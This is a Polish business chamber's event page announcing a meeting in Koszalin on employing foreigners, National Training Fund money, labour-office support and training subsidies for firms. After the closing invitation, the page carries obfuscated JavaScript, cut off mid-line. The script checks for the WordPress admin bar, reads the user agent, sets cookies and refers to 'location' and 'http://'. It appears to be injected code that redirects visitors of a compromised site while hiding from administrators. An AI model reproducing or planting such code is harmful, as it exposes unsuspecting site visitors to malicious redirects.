Wsparcie finansowe i kadrowe dla przedsiębiorców- spotkanie informacyjne | Północna Izba Gospodarcza w Koszalinie

spotkanie-informacyjne-Polnocna-Izba-Koszalin-dla-przedsiebiorcowZapraszają
na spotkanie informacyjne dotyczące

wsparcia finansowego i kadrowego dla przedsiębiorców

Spotkanie odbędzie się 30 stycznia o godzinie 12 w Restauracji Maredo w Koszalinie przy ulicy Zwycięstwa 45.

Tematyka spotkania:

Na spotkaniu zostaną przedstawione informacje na temat:

 • Nowe przepisy w zatrudnianiu cudzoziemców – zmiany 2018
 • Krajowy Fundusz Szkoleniowy realizacja na rok 2018
 • Formy wsparcia dla przedsiębiorców z Urzędu Pracy
 • Dofinansowania do usług szkoleniowych z Koszalińskiej Agencji Rozwoju Regionalnego
 • Pożyczki dla firm w naszym regionie

Szkolenie poprowadzą przedstawiciele Powiatowego Urzędu Pracy w Koszalinie oraz pracownicy Koszalińskiej Agencji Rozwoju Regionalnego.

Potwierdzenia obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie pod numer 537 184 630.

Jeżeli podane godziny szkoleń Państwu nie odpowiadają, bardzo prosimy o informację.

Dodatkowe informacje:

Od 01.01.2018 r. Urzędy Pracy realizują nowe zadania związane z zatrudnieniem cudzoziemców.

Na spotkaniu zostaną przedstawione zasady, których należy dopełnić, aby legalnie zatrudnić cudzoziemca w ramach: 

 • zezwolenia na pracę sezonową,
 • oświadczenia o powierzeniu wykonywania pracy cudzoziemcowi.

Powiatowe urzędy pracy mogą przeznaczyć środki Krajowego Funduszu Szkoleniowego na finansowanie działań obejmujących kształcenie ustawiczne pracowników i pracodawcy, na które składają się:

 • kursy i studia podyplomowe realizowane z inicjatywy pracodawcy lub za jego zgodą,
 • egzaminy umożliwiające uzyskanie dokumentów potwierdzających nabycie umiejętności, kwalifikacji lub uprawnień zawodowych,
 • badania lekarskie i psychologiczne wymagane do podjęcia kształcenia lub pracy zawodowej po ukończonym kształceniu,
 • ubezpieczenie od następstw nieszczęśliwych wypadków w związku z podjętym kształceniem,
 • określenie potrzeb pracodawcy w zakresie kształcenia ustawicznego, w związku z ubieganiem się o sfinansowanie tego kształcenia ze środków KFS.

Na spotkaniu przedstawiona zostanie również informacja, o przeznaczonych dla pracodawców formach wsparcia mających na celu tworzenie nowych miejsc zatrudnienia jakimi w 2018 r. będzie dysponował PUP w Koszalinie.

KOSZALIŃSKA AGENCJA ROZWOJU REGIONALNEGO S.A. jest Operatorem Usług Rozwojowych dla mikro, małych i średnich przedsiębiorstw oraz stowarzyszeń, fundacji i spółdzielni (prowadzących działalność gospodarczą) z województwa zachodniopomorskiego, w ramach których mogą oni uzyskać wsparcie do 80% REFUNDACJI KOSZTÓW

USŁUG SZKOLENIOWYCH ORAZ DORADCZYCH TAKICH JAK NP.: SZKOLENIA, STUDIA PODYPLOMOWE, E-LEARNING, KURSY ZAWODOWE, EGZAMINY, DORADZTWO, MENTORING, COACHING.

Usługi rozwojowe oferowane są w ramach projektu pt. „Usługi rozwojowe dla przedsiębiorców i pracowników przedsiębiorstw dostępne w ramach Bazy Usług Rozwojowych”.

MŚP mogą korzystać z wybranych przez siebie usług firm szkoleniowych oraz doradczych na terenie całej Polski pod warunkiem, że instytucja szkoleniowa lub doradcza jest zarejestrowana w Bazie Usług Rozwojowych (BUR) pod adresem: www.uslugirozwojowe.parp.gov.pl

Zapraszamy do uczestnictwa! 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m